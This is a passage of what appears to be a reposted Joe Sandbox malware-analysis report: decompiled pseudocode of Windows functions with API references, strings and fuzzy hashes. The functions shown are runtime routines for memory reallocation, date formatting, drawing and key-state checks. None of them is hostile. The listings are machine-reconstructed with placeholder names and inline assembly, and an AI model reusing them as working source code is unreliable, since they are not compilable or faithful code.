0x30; 										_t173 = _t202 + 4 - _t94; 										__eflags = _t173; 										if(_t173 > 0) { 											 *(_t196 + _t202 - 4) = _t173; 											 *((intOrPtr*)(_t196 - 4 + _t94)) = _t173 + 3; 											_t203 = _t94; 											__eflags = _t173 - 0xb30; 											if(_t173 >= 0xb30) { 												__eflags = _t94 + _t196; 												E004015FC(_t94 + _t196, _t154, _t173); 											} 										} else { 											 *(_t196 + _t202) =  *(_t196 + _t202) & 0xfffffff7; 											_t203 = _t202 + 4; 										} 										_t204 = _t203 | _t136; 										__eflags = _t204; 										 *(_t196 - 4) = _t204; 										 *0x463718 = 0; 										_t80 = _t196; 										L49: 										return _t80; 									} else { 										while(1) { 											asm("lock cmpxchg [0x463718], ah"); 											if(__eflags == 0) { 												break; 											} 											Sleep(0); 											_t166 = _t166; 											_t154 = _t154; 											asm("lock cmpxchg [0x463718], ah"); 											if(__eflags != 0) { 												Sleep(0xa); 												_t166 = _t166; 												_t154 = _t154; 												continue; 											} 											break; 										} 										_t136 = 0x0000000f &  *(_t196 - 4); 										_t100 =  *(_t182 - 4); 										__eflags = _t100 & 0x00000001; 										if((_t100 & 0x00000001) == 0) { 											L50: 											 *0x463718 = 0; 											goto L51; 										} else { 											_t86 = _t100 & 0xfffffff0; 											_t202 = _t154 + _t86; 											__eflags = _t166 - _t202; 											if(_t166 > _t202) { 												goto L50; 											} else { 												goto L42; 											} 										} 									} 								} 							} 						} else { 							_t205 = __edx + __edx; 							__eflags = _t205 - _t154; 							if(_t205 < _t154) { 								__eflags = __edx - 0xb2c; 								if(__edx >= 0xb2c) { 									L19: 									_t16 = _t166 + 0xd3; // 0xbff 									_t208 = (_t16 & 0xffffff00) + 0x30; 									_t157 = _t154 + 4 - _t208; 									__eflags =  *0x46304d; 									if(__eflags 
!= 0) { 										while(1) { 											asm("lock cmpxchg [0x463718], ah"); 											if(__eflags == 0) { 												break; 											} 											Sleep(0); 											_t157 = _t157; 											asm("lock cmpxchg [0x463718], ah"); 											if(__eflags != 0) { 												Sleep(0xa); 												_t157 = _t157; 												continue; 											} 											break; 										} 										_t136 = 0x0000000f &  *(_t196 - 4); 										__eflags = 0xf; 									} 									 *(_t196 - 4) = _t136 | _t208; 									_t139 = _t157; 									_t174 =  *(_t182 - 4); 									__eflags = _t174 & 0x00000001; 									if((_t174 & 0x00000001) != 0) { 										_t102 = _t182; 										_t175 = _t174 & 0xfffffff0; 										_t139 = _t139 + _t175; 										_t182 = _t182 + _t175; 										__eflags = _t175 - 0xb30; 										if(_t175 >= 0xb30) { 											E004015BC(_t102); 										} 									} else { 										 *(_t182 - 4) = _t174 | 0x00000008; 									} 									 *((intOrPtr*)(_t182 - 8)) = _t139; 									 *((intOrPtr*)(_t196 + _t208 - 4)) = _t139 + 3; 									__eflags = _t139 - 0xb30; 									if(_t139 >= 0xb30) { 										E004015FC(_t196 + _t208, _t157, _t139); 									} 									 *0x463718 = 0; 									return _t196; 								} else { 									__eflags = _t205 - 0xb2c; 									if(_t205 < 0xb2c) { 										_t190 = __edx; 										_t111 = E00401820(__edx); 										__eflags = _t111; 										if(_t111 != 0) { 											E004015A0(_t196, _t190, _t111); 											E00401B88(_t196, _t190); 										} 										return _t111; 									} else { 										_t166 = 0xb2c; 										goto L19; 									} 								} 							} else { 								return __eax; 							} 						} 					} 				} else { 					_t141 =  *_t145; 					_t160 = ( *(_t141 + 2) & 0x0000ffff) - 4; 					if(_t160 < __edx) { 						_push(__edi); 						_t193 = __edx; 						asm("adc eax, 0xffffffff"); 						_t119 = E00401820((0 & _t160 + _t160 + 0x00000020 - __edx) + __edx); 						__eflags = _t119; 						if(_t119 != 0) { 							
__eflags = _t193 - 0x40a2c; 							if(_t193 > 0x40a2c) { 								 *((intOrPtr*)(_t119 - 8)) = _t193; 							} 							__eflags = ( *(_t141 + 2) & 0x0000ffff) - 4; 							_t195 = _t119; 							 *((intOrPtr*)(_t141 + 0x1c))(); 							E00401B88(_t196, _t195); 							_t119 = _t195; 						} 						return _t119; 					} else { 						if(0x40 + __edx * 4 < _t160) { 							_t143 = __edx; 							_t125 = E00401820(__edx); 							__eflags = _t125; 							if(_t125 != 0) { 								E004015A0(_t196, _t143, _t125); 								E00401B88(_t196, __edi); 								return _t125; 							} 							return _t125; 						} else { 							return __eax; 						} 					} 				} 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 028d8d3468e21b9f8e1c609a3c3ddb42240f5f23514891230630539b3f9fe126
                                                                            • Instruction ID: 6b3b6843e27bb62f7e5d94541143b704e997bbcd7bebc6a2cddc521959e2f60c
                                                                            • Opcode Fuzzy Hash: 028d8d3468e21b9f8e1c609a3c3ddb42240f5f23514891230630539b3f9fe126
                                                                            • Instruction Fuzzy Hash: C2A1F5637106004BD718AA7D9D8536EB3819BC5366F58823FF515EB3E2EB7C8D418289
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 76%
E0040A67C(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
    char _v8;
    short _v18;
    short _v22;
    struct _SYSTEMTIME _v24;
    char _v280;
    intOrPtr _v284;
    char* _t34;
    intOrPtr* _t50;
    intOrPtr _t59;
    void* _t64;
    intOrPtr _t66;
    void* _t70;

    _v8 = 0;
    _t50 = __edx;
    _t64 = __eax;
    _push(_t70);
    _push(0x40a76a);
    _push(*[fs:eax]);
    *[fs:eax] = _t70 + 0xfffffee8;
    E0040473C(__edx);
    _v24 = *(_a4 - 0xe) & 0x0000ffff;
    _v22 = *(_a4 - 0x10) & 0x0000ffff;
    _v18 = *(_a4 - 0x12) & 0x0000ffff;
    if(_t64 > 2) {
        E004047D4(&_v8, 0x40a78c);
    } else {
        E004047D4(&_v8, 0x40a780);
    }
    _t34 = E00404C00(_v8);
    if(GetDateFormatA(GetThreadLocale(), 4, &_v24, _t34, &_v280, 0x100) != 0) {
        E004049AC(_t50, 0x100, &_v280);
        if(_t64 == 1 && *((char*)(*_t50)) == 0x30) {
            _v284 = *_t50;
            _t66 = _v284;
            if(_t66 != 0) {
                _t66 = *((intOrPtr*)(_t66 - 4));
            }
            E00404C60(*_t50, _t66 - 1, 2, _t50);
        }
    }
    _pop(_t59);
    *[fs:eax] = _t59;
    _push(E0040A771);
    return E0040473C(&_v8);
}


                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040A76A), ref: 0040A702
                                                                            • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0040A76A), ref: 0040A708
                                                                            Strings
                                                                            • yyyy , xrefs: 0040A6DD
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: DateFormatLocaleThread
                                                                            • String ID: yyyy
                                                                            • API String ID: 3303714858-3145165042
                                                                            • Opcode ID: 6cf301cd4dbb5b34b884b87cd4e9d6bd7c982b661da83cb5c451281789fad814
                                                                            • Instruction ID: 8081e552295268892be29cc280909309cbc7073684cf05299d24970e3d403a10
                                                                            • Opcode Fuzzy Hash: 6cf301cd4dbb5b34b884b87cd4e9d6bd7c982b661da83cb5c451281789fad814
                                                                            • Instruction Fuzzy Hash: F12141756002189BDB11DBA5C982AAE73B8EF48700F5140B7F905F7381D738DE54D76A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 64%
E0043AD10(void* __eax, void* __ebx, void* __edi, void* __esi) {
    char _v8;
    char _v12;
    char _v16;
    intOrPtr _t31;
    void* _t36;
    intOrPtr _t42;
    struct HDC__* _t47;
    void* _t50;

    _push(__esi);
    _v16 = 0;
    _t36 = __eax;
    _push(_t50);
    _push(0x43ada6);
    _push( *[fs:eax]);
    *[fs:eax] = _t50 + 0xfffffff4;
    if( *((intOrPtr*)(__eax + 0x30)) == 0) {
        _v12 = *((intOrPtr*)(__eax + 8));
        _v8 = 0xb;
        _t31 = *0x462dec; // 0x423568
        E00406740(_t31, &_v16);
        E0040C158(_t36, _v16, 1, __edi, __esi, 0, &_v12);
        E00404184();
    }
    _t47 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x30)))) + 0x48))();
    SetViewportOrgEx(_t47, *(_t36 + 0x40), *(_t36 + 0x44), 0);
    IntersectClipRect(_t47, 0, 0, *(_t36 + 0x48), *(_t36 + 0x4c));
    _pop(_t42);
    *[fs:eax] = _t42;
    _push(0x43adad);
    return E0040473C( &_v16);
}


                                                                            APIs
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0043AD79
                                                                            • IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 0043AD8B
                                                                              • Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772
                                                                            Strings
                                                                            • h5B , xrefs: 0043AD46
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ClipIntersectLoadRectStringViewport
                                                                            • String ID: h5B
                                                                            • API String ID: 2734429277-2204541312
                                                                            • Opcode ID: 39734b3fce4a725eba0d90988523030e866c8d2b1382112e9c4397644d4563ed
                                                                            • Instruction ID: 1ef2c5308e92dbb7852dc5f6e9ef6c5674e045902edf6ecf16b6e61c915b5d41
                                                                            • Opcode Fuzzy Hash: 39734b3fce4a725eba0d90988523030e866c8d2b1382112e9c4397644d4563ed
                                                                            • Instruction Fuzzy Hash: 51114F71600204AFDB44DF58CC81FAA77A8EB49314F5040AAFE04DB291EB79AD10CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0043ADB8(void* __eflags, intOrPtr _a4) {
    signed char _v5;
    struct tagRECT _v21;
    struct tagRECT _v40;
    void* _t40;
    void* _t45;

    _v5 = 1;
    _t44 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x1cc));
    _t45 = E0041A868( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x1cc)), *((intOrPtr*)(_a4 - 4)));
    if(_t45 <= 0) {
        L5:
        _v5 = 0;
    } else {
        do {
            _t45 = _t45 - 1;
            _t40 = E0041A80C(_t44, _t45);
            if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
                goto L4;
            } else {
                E0043A33C(_t40, &_v40);
                IntersectRect( &_v21, _a4 + 0xffffffec, &_v40);
                if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
                    goto L4;
                }
            }
            goto L6;
            L4:
        } while (_t45 > 0);
        goto L5;
    }
    L6:
    return _v5 & 0x000000ff;
}


                                                                            APIs
                                                                            • IntersectRect.USER32 ref: 0043AE18
                                                                            • EqualRect.USER32 ref: 0043AE28
                                                                            Strings
                                                                            • @ , xrefs: 0043ADF9
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Rect$EqualIntersect
                                                                            • String ID: @
                                                                            • API String ID: 3291753422-2766056989
                                                                            • Opcode ID: e938c2b76a2eeda78225ce8cf867d930fa1488dbab9837213577f1d7a8766f1b
                                                                            • Instruction ID: 6e9426432a3e6fadb88004f381f8470911db4cd695cec418565dc038f1e98b7e
                                                                            • Opcode Fuzzy Hash: e938c2b76a2eeda78225ce8cf867d930fa1488dbab9837213577f1d7a8766f1b
                                                                            • Instruction Fuzzy Hash: 5811A031A442885BCB01DA6DC885BDF7BE89F49318F0442A6FC48EB382D779DE1587D5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00422DC8(int _a4) {
    void* __ebx;
    void* __ebp;
    signed int _t2;
    signed int _t3;
    int _t8;
    void* _t12;
    void* _t13;
    void* _t17;
    void* _t18;

    _t8 = _a4;
    if( *0x466338 == 0) {
        *0x466310 = E00422CE4(0, _t8, *0x466310, _t17, _t18);
        return GetSystemMetrics(_t8);
    }
    _t3 = _t2 | 0xffffffff;
    _t12 = _t8 + 0xffffffb4 - 2;
    __eflags = _t12;
    if(__eflags < 0) {
        _t3 = 0;
    } else {
        if(__eflags == 0) {
            _t8 = 0;
        } else {
            _t13 = _t12 - 1;
            __eflags = _t13;
            if(_t13 == 0) {
                _t8 = 1;
            } else {
                __eflags = _t13 - 0xffffffffffffffff;
                if(_t13 - 0xffffffffffffffff < 0) {
                    _t3 = 1;
                }
            }
        }
    }
    __eflags = _t3 - 0xffffffff;
    if(_t3 != 0xffffffff) {
        return _t3;
    } else {
        return GetSystemMetrics(_t8);
    }
}


                                                                            APIs
                                                                            • GetSystemMetrics.USER32 ref: 00422E2A
                                                                              • Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63
                                                                            • GetSystemMetrics.USER32 ref: 00422DF0
                                                                            Strings
                                                                            • GetSystemMetrics , xrefs: 00422DD8
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MetricsSystem$AddressProc
                                                                            • String ID: GetSystemMetrics
                                                                            • API String ID: 1792783759-96882338
                                                                            • Opcode ID: c25a38d46c1e4ffea5b60ab85707767b0b04cc81a25b6e54c2e579306e5f87fa
                                                                            • Instruction ID: 5fc931f2355d86599297f92dc66c6923be0ac5e92dc587121fe74810b58b28c3
                                                                            • Opcode Fuzzy Hash: c25a38d46c1e4ffea5b60ab85707767b0b04cc81a25b6e54c2e579306e5f87fa
                                                                            • Instruction Fuzzy Hash: A5F062307141507ACA254A38BE842267546AB45330FE25B37E5229A2D5DFFC8C91A25E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 61%
E0043369C(void* __eax) {
    signed char _v17;
    signed char _v24;
    signed int _t8;

    asm("movsd");
    asm("movsd");
    asm("movsd");
    asm("movsd");
    _t8 = _v24 & 0x000000ff;
    if(_t8 != 0) {
        if(GetKeyState(0x10) < 0) {
            _t8 = _t8 + 0x2000;
        }
        if(GetKeyState(0x11) < 0) {
            _t8 = _t8 + 0x4000;
        }
        if((_v17 & 0x00000020) != 0) {
            _t8 = _t8 + 0x8000;
        }
    }
    return _t8;
}


                                                                            APIs
                                                                            • GetKeyState.USER32(00000010), ref: 004336B7
                                                                            • GetKeyState.USER32(00000011), ref: 004336C8
                                                                            Strings
                                                                            • , xrefs: 004336D7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: State
                                                                            • String ID:
                                                                            • API String ID: 1649606143-3916222277
                                                                            • Opcode ID: 214cf5a452d32b715b633cccca3f99564eca22495acae71db1ba112392d63aef
                                                                            • Instruction ID: 8f684c87d4741464f805386feb5dbb40cfecca0e0810653843f36d644f5af4db
                                                                            • Opcode Fuzzy Hash: 214cf5a452d32b715b633cccca3f99564eca22495acae71db1ba112392d63aef
                                                                            • Instruction Fuzzy Hash: 6FE02B2270464226E62179552C063D713904F417A9F0D066BBDC42B2C2D29F0B1550AA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Source: https://www.joesandbox.com/analysis/532011/0/html

                                                                            Posted by: ruebenbochnerie.blogspot.com
